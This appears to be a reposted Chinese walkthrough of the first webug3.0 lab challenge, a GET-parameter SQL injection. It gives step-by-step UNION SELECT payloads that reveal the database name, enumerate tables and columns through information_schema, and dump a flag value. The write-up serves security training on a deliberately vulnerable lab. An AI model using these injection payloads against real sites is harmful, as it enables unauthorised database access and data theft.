普通的get注入
首先这是这道题
我们点击去
发现有一个可以提交数据的地方,对于常见的漏洞来说,可以提交数据的地方就是可以控制输入的地方,就有可能存在漏洞,而且我们从网页上看到他显示的有四条数据 可以构造语句如下:1 ' union select 1,2,3,database()#我们直接试一下sql注入语句
则·当前数据库为pentesterlab
我们再爆一下表1 ' union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#
可以看到有一个flag表 我们爆一下列
1 ' union select 1,2,3,column_name from information_schema.columns where table_name='flag'#
爆字段1 ' union select 1,2,3,flag from flag#
flag:204f704fbbcf6acf398ffee11989b377
最后
以上就是缓慢月光最近收集整理的关于webug3.0第一题 普通的get注入普通的get注入的全部内容,更多相关webug3.0第一题内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复